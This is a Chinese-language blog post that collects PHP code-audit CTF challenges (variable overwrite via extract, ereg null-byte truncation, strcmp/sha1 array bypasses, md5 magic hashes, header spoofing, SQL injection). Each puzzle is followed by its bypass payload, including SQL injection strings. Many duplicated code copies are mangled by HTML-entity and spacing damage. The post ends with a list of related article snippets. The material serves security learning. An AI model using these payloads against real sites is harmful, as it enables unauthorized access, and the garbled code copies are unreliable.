ctf中的php代码审计

做ctf题时，遇到审计题时可能会遇到，翻翻记录可以很快的找到脑洞。

$flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'ctf{xxx}'; } else { echo'Oh.no'; } }

$flag = 'xxx' ;

extract ( $_GET ) ;

if ( isset ( $shiyan ) )

{

$content = trim ( file_get_contents ( $flag ) ) ;

if ( $shiyan == $content )

{

echo 'ctf{xxx}' ;

}

else

{

echo 'Oh.no' ;

}

变量覆盖漏洞 PHP extract() 函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素，键名用于变量名，键值用于变量值。 file_get_contents：远程获取获取文件，若没有则为空构造shiyan=&flag=1

变量覆盖漏洞

PHP < a href = "http://www.am0s.com/functions/87.html" > extract ( ) < / a > 函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素，键名用于变量名，键值用于变量值。

file_get_contents：远程获取获取文件，若没有则为空

构造 shiyan =& amp ; flag = 1

$value) { $value = trim($value); is_string($value) && $req[$key] = addslashes($value); } } function is_palindrome_number($number) { $number = strval($number); $i = 0; $j = strlen($number) - 1; while($i < $j) { if($number[$i] !== $number[$j]) { return false; } $i++; $j--; } return true; } if(is_numeric($_REQUEST['number'])) { $info="sorry, you cann't input a number!"; } elseif($req['number']!=strval(intval($req['number']))) { $info = "number must be equal to it's integer!! "; } else { $value1 = intval($req["number"]); $value2 = intval(strrev($req["number"])); if($value1!=$value2){ $info="no, this is not a palindrome number!"; } else { if(is_palindrome_number($req["number"])){ $info = "nice! {$value1} is a palindrome number!"; } else { $info=$flag; } } } echo $info;

$info = "" ;

$req = [ ] ;

$flag = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" ;

ini_set ( "display_error" , false ) ;

error_reporting ( 0 ) ;

if ( ! isset ( $_GET [ 'number' ] ) ) {

header ( "hint:26966dc52e85af40f59b4fe73d8c323a.txt" ) ;

die ( "have a fun!!" ) ;

}

foreach ( [ $_GET , $_POST ] as $global_var ) {

foreach ( $global_var as $key = > $value ) {

$value = trim ( $value ) ;

is_string ( $value ) && $req [ $key ] = addslashes ( $value ) ;

}

function is_palindrome_number ( $number ) {

$number = strval ( $number ) ;

$i = 0 ;

$j = strlen ( $number ) - 1 ;

while ( $i < $j ) {

if ( $number [ $i ] !== $number [ $j ] ) {

return false ;

}

$i ++ ;

$j -- ;

}

return true ;

}

if ( is_numeric ( $_REQUEST [ 'number' ] ) )

{

$info = "sorry, you cann't input a number!" ;

}

elseif ( $req [ 'number' ] != strval ( intval ( $req [ 'number' ] ) ) )

{

$info = "number must be equal to it's integer!! " ;

}

else

{

$value1 = intval ( $req [ "number" ] ) ;

$value2 = intval ( strrev ( $req [ "number" ] ) ) ;

if ( $value1 != $value2 ) {

$info = "no, this is not a palindrome number!" ;

}

else

{

if ( is_palindrome_number ( $req [ "number" ] ) ) {

$info = "nice! {$value1} is a palindrome number!" ;

}

else

{

$info = $flag ;

}

echo $info ;

where)) { $this->select($this->where); } } function select($where) { $sql = mysql_query('select * from user where '.$where); //函数执行一条 MySQL 查询。 return @mysql_fetch_array($sql); //从结果集中取得一行作为关联数组，或数字数组，或二者兼有返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false } } if(isset($requset['token'])) //测试变量是否已经配置。若变量已存在则返回 true 值。其它情形返回 false 值。 { $login = unserialize(gzuncompress(base64_decode($requset['token']))); //gzuncompress:进行字符串压缩 //unserialize: 将已序列化的字符串还原回 PHP 的值 $db = new db(); $row = $db->select('user=''.mysql_real_escape_string($login['user']).'''); //mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。 if($login['user'] === 'ichunqiu') { echo $flag; }else if($row['pass'] !== $login['pass']){ echo 'unserialize injection!!'; }else{ echo "(╯‵□′)╯︵┴─┴ "; } }else{ header('Location: index.php?error=1'); } ?>

include 'common.php' ;

$requset = array_merge ( $_GET , $_POST , $_SESSION , $_COOKIE ) ;

//把一个或多个数组合并为一个数组

class db

{

public $where ;

function __wakeup ( )

{

if ( ! empty ( $this -> where ) )

{

$this -> select ( $this -> where ) ;

}

function select ( $where )

{

$sql = mysql_query ( 'select * from user where ' . $where ) ;

//函数执行一条 MySQL 查询。

return @ mysql_fetch_array ( $sql ) ;

//从结果集中取得一行作为关联数组，或数字数组，或二者兼有返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false

}

if ( isset ( $requset [ 'token' ] ) )

//测试变量是否已经配置。若变量已存在则返回 true 值。其它情形返回 false 值。

{

$login = unserialize ( gzuncompress ( base64_decode ( $requset [ 'token' ] ) ) ) ;

//gzuncompress:进行字符串压缩

//unserialize: 将已序列化的字符串还原回 PHP 的值

$db = new db ( ) ;

$row = $db -> select ( 'user=' '.mysql_real_escape_string($login[' user ']).' '' ) ;

//mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

if ( $login [ 'user' ] === 'ichunqiu' )

{

echo $flag ;

} else if ( $row [ 'pass' ] !== $login [ 'pass' ] ) {

echo 'unserialize injection!!' ;

} else {

echo "(╯‵□′)╯︵┴─┴ " ;

}

} else {

header ( 'Location: index.php?error=1' ) ;

}

<?php $arr = array('user' => 'ichunqiu'); $a = base64_encode(gzcompress(serialize($arr))); echo $a; ?>

& lt ; ? php

$arr = array ( 'user' =& gt ; 'ichunqiu' ) ;

$a = base64_encode ( gzcompress ( serialize ( $arr ) ) ) ;

echo $a ;

? & gt ;

<?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'." "; echo '<input name="uname" type="text"/>'." "; echo '<input name="pwd" type="text"/>'." "; echo '<input type="submit" />'." "; echo '</form>'." "; echo ''." "; die; } function AttackFilter($StrKey,$StrValue,$ArrReq){ if (is_array($StrValue)){ //检测变量是否是数组 $StrValue=implode($StrValue); //返回由数组元素组合成的字符串 } if (preg_match("/".$ArrReq."/is",$StrValue)==1){ //匹配成功一次后就会停止匹配 print "水可载舟，亦可赛艇！"; exit(); } } $filter = "and|select|from|where|union|join|sleep|benchmark|,|(|)"; foreach($_POST as $key=>$value){ //遍历数组 AttackFilter($key,$value,$filter); } $con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); if (!$con){ die('Could not connect: ' . mysql_error()); } $db="XXXXXX"; mysql_select_db($db, $con); //设置活动的 MySQL 数据库 $sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'"; $query = mysql_query($sql); //执行一条 MySQL 查询 if (mysql_num_rows($query) == 1) { //返回结果集中行的数目 $key = mysql_fetch_array($query); //返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false if($key['pwd'] == $_POST['pwd']) { print "CTF{XXXXXX}"; }else{ print "亦可赛艇！"; } }else{ print "一颗赛艇！"; } mysql_close($con); ?>

& lt ; ? php

error_reporting ( 0 ) ;

if ( ! isset ( $_POST [ 'uname' ] ) || ! isset ( $_POST [ 'pwd' ] ) ) {

echo '<form action="" method="post">' . " " ;

echo '<input name="uname" type="text"/>' . " " ;

echo '<input name="pwd" type="text"/>' . " " ;

echo '<input type="submit" />' . " " ;

echo '</form>' . " " ;

echo '' . " " ;

die ;

}

function AttackFilter ( $StrKey , $StrValue , $ArrReq ) {

if ( is_array ( $StrValue ) ) {

//检测变量是否是数组

$StrValue = implode ( $StrValue ) ;

//返回由数组元素组合成的字符串

}

if ( preg_match ( "/" . $ArrReq . "/is" , $StrValue ) == 1 ) {

//匹配成功一次后就会停止匹配

print "水可载舟，亦可赛艇！" ;

exit ( ) ;

}

foreach ( $_POST as $key =& gt ; $value ) {

//遍历数组

AttackFilter ( $key , $value , $filter ) ;

}

$con = mysql_connect ( "XXXXXX" , "XXXXXX" , "XXXXXX" ) ;

if ( ! $con ) {

die ( 'Could not connect: ' . mysql_error ( ) ) ;

}

$db = "XXXXXX" ;

mysql_select_db ( $db , $con ) ;

//设置活动的 MySQL 数据库

$sql = "SELECT * FROM interest WHERE uname = '{$_POST['uname']}'" ;

$query = mysql_query ( $sql ) ;

//执行一条 MySQL 查询

if ( mysql_num_rows ( $query ) == 1 ) {

//返回结果集中行的数目

$key = mysql_fetch_array ( $query ) ;

//返回根据从结果集取得的行生成的数组，如果没有更多行则返回 false

if ( $key [ 'pwd' ] == $_POST [ 'pwd' ] ) {

print "CTF{XXXXXX}" ;

} else {

print "亦可赛艇！" ;

}

} else {

print "一颗赛艇！" ;

}

mysql_close ( $con ) ;

? & gt ;

admin' GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1-- -

1	admin' GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1 -- -

<?php if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo 'You password must be alphanumeric'; } else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999) { if (strpos ($_GET['password'], '*-*') !== FALSE) { die('Flag: ' . $flag); } else { echo('*-* have not been found'); } } else { echo 'Invalid password'; } } ?>

& lt ; ? php

if ( isset ( $_GET [ 'password' ] ) )

{

if ( ereg ( "^[a-zA-Z0-9]+$" , $_GET [ 'password' ] ) === FALSE )

{

echo 'You password must be alphanumeric' ;

}

else if ( strlen ( $_GET [ 'password' ] ) & lt ; 8 & amp ; & amp ; $_GET [ 'password' ] & gt ; 9999999 )

{

if ( strpos ( $_GET [ 'password' ] , '*-*' ) !== FALSE )

{

die ( 'Flag: ' . $flag ) ;

}

else

{

echo ( '*-* have not been found' ) ;

}

else

{

echo 'Invalid password' ;

}

? & gt ;

ereg漏洞 payload：1e9%00*-* 正则%00截断

< a href = "http://www.am0s.com/functions/203.html" > ereg漏洞 < / a >

payload： 1e9 % 00 * - *

正则 % 00截断

if (isset($_GET['a'])) { if (strcmp($_GET['a'], $flag) == 0) //比较两个字符串（区分大小写） die('Flag: '.$flag); else print '离成功更近一步了'; }

if ( isset ( $_GET [ 'a' ] ) ) {

if ( strcmp ( $_GET [ 'a' ] , $flag ) == 0 )

//比较两个字符串（区分大小写）

die ( 'Flag: ' . $flag ) ;

else

print '离成功更近一步了' ;

}

payload:?a[]=1

1 2	payload : ? a [ ] = 1

漏洞原理http://www.am0s.com/functions/201.html

在5.3的版本之后使用strcmp函数比较会返回0

1	在 5.3的版本之后使用 strcmp函数比较会返回 0

<?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo 'Your password can not be your name!'; else if (sha1($_GET['name']) === sha1($_GET['password'])) die('Flag: '.$flag); else echo 'Invalid password.'; } else echo 'Login first!'; ?>

& lt ; ? php

if ( isset ( $_GET [ 'name' ] ) and isset ( $_GET [ 'password' ] ) )

{

if ( $_GET [ 'name' ] == $_GET [ 'password' ] )

echo 'Your password can not be your name!' ;

else if ( sha1 ( $_GET [ 'name' ] ) === sha1 ( $_GET [ 'password' ] ) )

die ( 'Flag: ' . $flag ) ;

else

echo 'Invalid password.' ;

}

else

echo 'Login first!' ;

? & gt ;

===会比较类型，比如bool。 sha1()函数和md5()函数存在着漏洞，sha1()函数默认的传入参数类型是字符串型，那要是给它传入数组呢会出现错误，使sha1()函数返回错误，也就是返回false，这样一来===运算符就可以发挥作用了，需要构造username和password既不相等，又同样是数组类型 ?name[]=a&password[]=b

===会比较类型，比如 bool。

sha1 ( )函数和 < a href = "http://www.am0s.com/functions/204.html" > md5 ( ) < / a >函数存在着漏洞， sha1 ( )函数默认的传入参数类型是字符串型，那要是给它传入数组呢会出现错误，使 sha1 ( )函数返回错误，也就是返回 false，这样一来 ===运算符就可以发挥作用了，需要构造 username和 password既不相等，又同样是数组类型

? name [ ] = a & amp ; password [ ] = b

<?php session_start(); if (isset ($_GET['password'])) { if ($_GET['password'] == $_SESSION['password']) die ('Flag: '.$flag); else print 'Wrong guess.'; } mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000)); ?>

& lt ; ? php

session_start ( ) ;

if ( isset ( $_GET [ 'password' ] ) ) {

if ( $_GET [ 'password' ] == $_SESSION [ 'password' ] )

die ( 'Flag: ' . $flag ) ;

else

print 'Wrong guess.' ;

}

mt_srand ( ( microtime ( ) ^ rand ( 1 , 10000 ) ) % rand ( 1 , 10000 ) + rand ( 1 , 10000 ) ) ;

? & gt ;

抓包删掉cookie中的session即可

1	抓包删掉 cookie中的 session即可

<?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("********, "*****", "********"); mysql_select_db("phpformysql") or die("Could not select database"); if ($conn->connect_error) { die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]); $sql = "select pw from php where user='$user'"; $query = mysql_query($sql); if (!$query) { printf("Error: %sn", mysql_error($conn)); exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pw"]; if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) { //如果 str1 小于 str2 返回 < 0；如果 str1 大于 str2 返回 > 0；如果两者相等，返回 0。 echo "Logged in! Key:************** "; } else { echo("Log in failure!"); } } ?>

& lt ; ? php

if ( $_POST [ user ] & amp ; & amp ; $_POST [ pass ] ) {

$conn = mysql_connect ( "********, " * * * * * ", " * * * * * * * * ");

mysql_select_db(" phpformysql ") or die(" Could not select database ");

if ($conn->connect_error) {

die(" Connection failed : " . mysql_error($conn));

}

$user = $_POST[user];

$pass = md5($_POST[pass]);

$sql = " select pw from php where user = '$user' ";

$query = mysql_query($sql);

if (!$query) {

printf(" Error : % sn ", mysql_error($conn));

exit();

}

$row = mysql_fetch_array($query, MYSQL_ASSOC);

//echo $row[" pw "];

if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {

//如果 str1 小于 str2 返回 < 0；如果 str1 大于 str2 返回 > 0；如果两者相等，返回 0。

echo " & lt ; p & gt ; Logged in ! Key : * * * * * * * * * * * * * * & lt ; / p & gt ; ";

}

else {

echo(" & lt ; p & gt ; Log in failure ! & lt ; / p & gt ;" ) ;

}

? & gt ;

通过构造sql语句使row[pw]等于pass

10.

<?php if(eregi("hackerDJ",$_GET[id])) { echo("not allowed!"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "hackerDJ") { echo "Access granted!"; echo "flag: *****************} "; } ?>

& lt ; ? php

if ( eregi ( "hackerDJ" , $_GET [ id ] ) ) {

echo ( "not allowed!" ) ;

exit ( ) ;

}

$_GET [ id ] = urldecode ( $_GET [ id ] ) ;

if ( $_GET [ id ] == "hackerDJ" )

{

echo "Access granted!" ;

echo "flag: *****************} " ;

}

? & gt ;

正则漏洞，%00截断

11.

<?php if($_POST[user] && $_POST[pass]) { $conn = mysql_connect("*******", "****", "****"); mysql_select_db("****") or die("Could not select database"); if ($conn->connect_error) { die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]); $sql = "select user from php where (user='$user') and (pw='$pass')"; $query = mysql_query($sql); if (!$query) { printf("Error: %sn", mysql_error($conn)); exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pw"]; if($row['user']=="admin") { echo "Logged in! Key: *********** "; } if($row['user'] != "admin") { echo("You are not admin!"); } } ?>

& lt ; ? php

if ( $_POST [ user ] & amp ; & amp ; $_POST [ pass ] ) {

$conn = mysql_connect ( "*******" , "****" , "****" ) ;

mysql_select_db ( "****" ) or die ( "Could not select database" ) ;

if ( $conn - & gt ; connect_error ) {

die ( "Connection failed: " . mysql_error ( $conn ) ) ;

}

$user = $_POST [ user ] ;

$pass = md5 ( $_POST [ pass ] ) ;

$sql = "select user from php where (user='$user') and (pw='$pass')" ;

$query = mysql_query ( $sql ) ;

if ( ! $query ) {

printf ( "Error: %sn" , mysql_error ( $conn ) ) ;

exit ( ) ;

}

$row = mysql_fetch_array ( $query , MYSQL_ASSOC ) ;

//echo $row["pw"];

if ( $row [ 'user' ] == "admin" ) {

echo "Logged in! Key: *********** " ;

}

if ( $row [ 'user' ] != "admin" ) {

echo ( "You are not admin!" ) ;

}

? & gt ;

闭合注入，绕过验证

12.

<?php function GetIP(){ if(!empty($_SERVER["HTTP_CLIENT_IP"])) $cip = $_SERVER["HTTP_CLIENT_IP"]; else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) $cip = $_SERVER["HTTP_X_FORWARDED_FOR"]; else if(!empty($_SERVER["REMOTE_ADDR"])) $cip = $_SERVER["REMOTE_ADDR"]; else $cip = "0.0.0.0"; return $cip; } $GetIPs = GetIP(); if ($GetIPs=="1.1.1.1"){ echo "Great! Key is *********"; } else{ echo "错误！你的IP不在访问列表之内！"; } ?>

& lt ; ? php

function GetIP ( ) {

if ( ! empty ( $_SERVER [ "HTTP_CLIENT_IP" ] ) )

$cip = $_SERVER [ "HTTP_CLIENT_IP" ] ;

else if ( ! empty ( $_SERVER [ "HTTP_X_FORWARDED_FOR" ] ) )

$cip = $_SERVER [ "HTTP_X_FORWARDED_FOR" ] ;

else if ( ! empty ( $_SERVER [ "REMOTE_ADDR" ] ) )

$cip = $_SERVER [ "REMOTE_ADDR" ] ;

else

$cip = "0.0.0.0" ;

return $cip ;

}

$GetIPs = GetIP ( ) ;

if ( $GetIPs == "1.1.1.1" ) {

echo "Great! Key is *********" ;

}

else {

echo "错误！你的IP不在访问列表之内！" ;

}

? & gt ;

添加http头即可

13.

<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { echo "false!!!"; }} else{echo "please input a";} ?>

& lt ; ? php

$md51 = md5 ( 'QNKCDZO' ) ;

$a = @ $_GET [ 'a' ] ;

$md52 = @ md5 ( $a ) ;

if ( isset ( $a ) ) {

if ( $a != 'QNKCDZO' & amp ; & amp ; $md51 == $md52 ) {

echo "nctf{*****************}" ;

} else {

echo "false!!!" ;

} }

else { echo "please input a" ; }

? & gt ;

240610708神奇的数字

14.

<?php if($_GET[id]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $id = intval($_GET[id]); $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'")); if ($_GET[id]==1024) { echo "no! try again"; } else{ echo($query[content]); } } ?>

& lt ; ? php

if ( $_GET [ id ] ) {

mysql_connect ( SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT , SAE_MYSQL_USER , SAE_MYSQL_PASS ) ;

mysql_select_db ( SAE_MYSQL_DB ) ;

$id = intval ( $_GET [ id ] ) ;

$query = @ mysql_fetch_array ( mysql_query ( "select content from ctf2 where id='$id'" ) ) ;

if ( $_GET [ id ] == 1024 ) {

echo "no! try again" ;

}

else {

echo ( $query [ content ] ) ;

}

? & gt ;

1024.1

15.

if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else echo '骚年，继续努力吧啊~'; }

if ( isset ( $_GET [ 'nctf' ] ) ) {

if ( @ ereg ( "^[1-9]+$" , $_GET [ 'nctf' ] ) === FALSE )

echo '必须输入数字才行' ;

else if ( strpos ( $_GET [ 'nctf' ] , '#biubiubiu' ) !== FALSE )

die ( 'Flag: ' . $flag ) ;

else

echo '骚年，继续努力吧啊~' ;

}

此处还可以数组绕过

16.

#GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str); } return htmlentities($str, ENT_QUOTES); } $username = @clean((string)$_GET['username']); $password = @clean((string)$_GET['password']); $query='SELECT * FROM users WHERE name=''.$username.'' AND pass=''.$password.'';'; $result=mysql_query($query); if(!$result || mysql_num_rows($result) < 1){ die('Invalid password!'); } echo $flag;

#GOAL: login as admin,then get the flag;

error_reporting ( 0 ) ;

require 'db.inc.php' ;

function clean ( $str ) {

if ( get_magic_quotes_gpc ( ) ) {

$str = stripslashes ( $str ) ;

}

return htmlentities ( $str , ENT_QUOTES ) ;

}

$username = @ clean ( ( string ) $_GET [ 'username' ] ) ;

$password = @ clean ( ( string ) $_GET [ 'password' ] ) ;

$query = 'SELECT * FROM users WHERE name=' '.$username.' ' AND pass=' '.$password.' ';' ;

$result = mysql_query ( $query ) ;

if ( ! $result || mysql_num_rows ( $result ) & lt ; 1 ) {

die ( 'Invalid password!' ) ;

}

echo $flag ;

$query='SELECT * FROM users WHERE name=''admin'' AND pass=''or 1 #'';';

1	$query = 'SELECT * FROM users WHERE name=' 'admin' ' AND pass=' 'or 1 #' ';' ;

17.

<?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = $_POST[user]; $pass = md5($_POST[pass]); $query = @mysql_fetch_array(mysql_query("select pw from ctf where user=' $user '")); if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) { //strcasecmp:0 - 如果两个字符串相等 echo "Logged in! Key: ntcf{**************} "; } else { echo("Log in failure!"); } } ?>

& lt ; ? php

if ( $_POST [ user ] & amp ; & amp ; $_POST [ pass ] ) {

mysql_connect ( SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT , SAE_MYSQL_USER , SAE_MYSQL_PASS ) ;

mysql_select_db ( SAE_MYSQL_DB ) ;

$user = $_POST [ user ] ;

$pass = md5 ( $_POST [ pass ] ) ;

$query = @ mysql_fetch_array ( mysql_query ( "select pw from ctf where user=' $user '" ) ) ;

if ( ( $query [ pw ] ) & amp ; & amp ; ( ! strcasecmp ( $pass , $query [ pw ] ) ) ) {

//strcasecmp:0 - 如果两个字符串相等

echo "Logged in! Key: ntcf{**************} " ;

}

else {

echo ( "Log in failure!" ) ;

}

? & gt ;

payload:user=admin' and 0=1 union select '47bce5c74f589f4867dbd57e9ca9f808' #&pass=aaa

1	payload : user = admin ' and 0=1 union select ' 47bce5c74f589f4867dbd57e9ca9f808' #&pas

【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz 星盾网安 CTF php
天命：php的序列化题目简直是玄学，既不能本地复现，也不能求证靶场环境天命：本地php是复现不了反序列化漏洞的，都不知道是版本问题还是其他问题天命：这题也是有点奇怪的，明明用字符串2也应该是可以，但偏偏就不行，神奇了进来题目先看到php代码审计，是反序列化漏洞先看进来入口的逻辑，判断是不是正常的ascii码字符，然后反序列化，可以忽略校验，都是正常的//校验你是不是ascii码里面的合法字符fun
渗透测试练习题解析 3（CTF web）安全不再安全 CTF web 前端安全网络安全 web安全
1、[网鼎杯2020朱雀组]phpweb1考点：反序列化漏洞利用进入靶场，查看检查信息，发现存在两个参数func和p查看页面源代码payload：func=file_get_contents&p=php://filter/resource=index.php整理后，就是PHP代码审计了 func!=""){ echogettime($this->func,$this->p);
PHP代码审计之任意文件读取 order by PHP代码审计 php 安全 web安全
文章目录一、任意文件读取原理二、任意文件读取危害三、任意文件读取相关函数任意文件读取代码审计总结一、任意文件读取原理在一些文件下载以及浏览的工能点中，存在一些文件读取的函数，且参数中的文件名或者路径可以由于控制关键字符未能进行有效的过滤就会造成任意文件读取。二、任意文件读取危害①如果读取路径没有限制可以读取系统下任意敏感文件，如数据库账号密码，后台账号密码等…②通过任意文件读取将后端源码全部读取到
【BUUCTF】 HCTF2018 WarmUp 90wunch php 安全
这是一道有关php代码审计的入门题目，进入所给链接后看到的是一张滑稽的表情包按照常规思路f12，看一看有什么，结果发现了一个名为source.php的注释访问这个php页面，发现有一段代码代码先定义了一个checkFile函数，然后主函数在下大致意思是，只有链接中包含了file文件请求且通过了checkFile函数的验证，那么将把链接包含的file文件include到页面中，否则输出一张图片（推测
PHP代码审计之实战审代码篇2 昵称还在想呢 PHP代码审计 php 开发语言
4.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？logged_in){echo'Don\'tbothertryingtohackme!!!!!Thishackattempthasbeenlogged';$log->Warn("SecurityIssue:SometriedtoaccessthisfiledirectlyfromIP:".$_SERVER['REMOTE_ADDR
php代码审计知识点,PHP代码审计基础知识点幸福暗恋我 php代码审计知识点
一，PHP核心配置一·配置典型两个文件(配置目录的规则文件)php.ini(即仅在重启的时候可用).user.ini二·配置典型的命令语句1.用户限制语句，函数类变量类大小写敏感directive=value大小写敏感全局变量配置register_globals=off(作用是关闭自动注册的全局变量)可使用的符号与参数类(ini文件中)!、()、|位或、&位与、~位非、Value可以使：用引号界定
php代码审计基础,PHP代码审计基础-初级篇 weixin_39612720 php代码审计基础
对于php代码审计我也是从0开始学的，对学习过程进行整理输出沉淀如有不足欢迎提出共勉。对学习能力有较高要求，整个系列主要是在工作中快速精通php代码审计，整个学习周期5天，建议花一天时间熟悉php语法。我是直接phpstudy2019一键搭建小白首选所谓工欲善其事必先利其器，找一款适合自己的php开发工具自行百度搭建，我用的是phpstrom.初级篇主要讲1.php历史版本漏洞。2.变量配置缺陷。
DAY31：代码审计基础( PHP 篇) EdmunDJK php apache 开发语言
DAY31：代码审计基础(PHP篇)1、PHP代码审计基础1.1、代码审计概述代码审计（Codeaudit）是一种以发现程序错误，安全漏洞和违反程序规范为目标的源代码分析。软件代码审计是对编程项目中源代码的全面分析，旨在发现错误，安全漏洞或违反编程约定。它是防御性编程范例的一个组成部分，它试图在软件发布之前减少错误1.2、基本的PHP语法PHP脚本可以放在文档中的任何位置。PHP脚本以结束：PHP
php代码审计知识点,php代码审计知识点总结翔宇情 php代码审计知识点
**Php可以命令执行的函数**stringshell_exec(stringcommand)Shell_exec通过shell环境执行命令，并且将完整的输出以字符串的方式返回。PHP先运行一个shell环境，然后让shell进程运行你的命令，并且把所有输出以字符串形式返回，如果程序执行有错误或者程序没有输出，则返回null。$output=shell_exec('whoami');echo"$o
PHP代码审计基础知识廾匸0705 网络安全代码审计网络安全代码审计 php
前言本文章主要是PHP代码审计的一些基础知识，包括函数的用法，漏洞点，偏向基础部分，个人能力有限，部分可能会出现错误或者遗漏，读者可自行补充。代码执行代码执行是代码审计当中较为严重的漏洞，主要是一些命令执行函数的不适当使用。那么，常见的能够触发这类漏洞的函数有哪些呢？eval()想必大家对eval()函数应该并不陌生，简而言之eval()函数就是将传入的字符串当作PHP代码来进行执行。eval(s
HCTF 2018 Warm up MiaoA知识 CTF-web刷题 php
HCTF2018Warmup题目分析1.查看题目显示是一个php代码审计的题目2.登入网页查看3.既然是代码审计，就查看页面源代码看到源代码里提示一个source.php文件，所以我们猜测，要么是加载过来一个php文件（可是F12以后，没有发现），要么就是当前目录下有个source.php4.访问当前目录下的source.php,果然成功5.分析php代码直接复制到md,清除转义为html的字符,
PHP代码审计之入门实战 zsoft
系统介绍CMS名称：新秀企业网站系统PHP版官网：www.sinsiu.com版本：这里国光用的1.0正式版（官网最新的版本有毒，网站安装的时候居然默认使用远程数据库？？？迷之操作那站长的后台密码岂不是直接泄露了？疑似远程数据库地址：server.sinsiu.net）下载地址：蓝奏云Windows下使用PHPStudy可以直接安装，搭建起来还是很简单的。防护策略虽然这是一个不知名的小系统，但是安
Writeup 实验吧/WEB/Guess Next Session/1788 【PHP代码审计】 growing27
http://www.shiyanbar.com/ctf/1788http://ctf5.shiyanbar.com/web/Session.php源码：Wrongguess.';}mt_srand((microtime()^rand(1,10000))%rand(1,10000)+rand(1,10000));?>burp抓包，提交如下，另两者都为空，可以绕过判断password=PHPSESS
PHP代码审计之实战审代码篇1 昵称还在想呢 PHP代码审计 php android 开发语言
本章代码来之各种php的cms历史漏洞源码，供小伙伴们学习,本次三题1.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？//检测旧密码是否正确if($password!=''){$oldpassword=md5(md5($oldpassword));$r=$dosql->GetOne("SELECT`password`FROM`#@__member`WHERE`username`=
PHP代码审计之反序列化攻击链CVE-2019-6340漏洞研究昵称还在想呢 PHP代码审计 php 开发语言 web安全安全
关键词php反序列化cmsDrupalCVE-2019-6340DrupalKernel前言简简单单介绍下php的反序列化漏洞php反序列化漏洞简单示例来看一段简单的php反序列化示例isValid){if(filter_var($this->ipAddress,FILTER_VALIDATE_IP)){$this->isValid=True;}}$this->ping();}publicfunc
3.[BUUCTF HCTF 2018]WarmUp1 图灵·飞︿(￣︶￣)︿ WEB刷题 web基础
1.看题目提示分析题目内容盲猜一波~：是关于PHP代码审计的2.打开链接，分析题目给你提示了我们访问source.php来看一下大boss出现，开始详细手撕~3.手撕PHP代码（代码审计）本人是小白，所以第一步，先问chatGPT的意见：这个主要是对classemmm类的分析，然后还有后面的三个&&条件判断：结合代码去理解GPT给的解释，就可以很容易形成一个思路：重点在：if(!empty($_R
PHP代码审计之基础方法思路流程 st3pby 渗透测试网络安全 web安全
工具Fotify|代码审计静态扫描工具，商业化静态代码扫描工具，误报率相对较低。seay|源代码审计工具PHPStorm|是PHP编程语言开发的集成环境。chrome&burp&HackerBar插件&xdebug插件Xcheck|Xcheck是一个由腾讯公司CSIG质量部代码安全检查团队自研的静态应用安全测试工具。Xcheck在基于成熟的污点分析技术与对抽象语法树的精准剖解上，通过巧妙优雅的实现
[BJDCTF2020]Mark loves cat1 怪兽不会rap_哥哥我会crash BUUCTF web题 php git泄露 php代码审计 ctf
提示-信息收集.git泄露php代码审计拿到题先做信息收集这里用dirsearch扫了下目录###如果没有dirsearch我在之前的这篇博客有写dirsearch的安装环境以及地址还有怎么扫buuctf里的题[GXYCTF2019]禁止套娃1-CSDN博客从扫描结果来看这里存在git泄露这里使用githack拉下来git泄露的信息cd到扫描下来的文件里出现了三个文件，flag难道直接扫出来了吗读
攻防世界web新手练习 -unseping sean7777777 WEB刷题记录网络安全 web安全
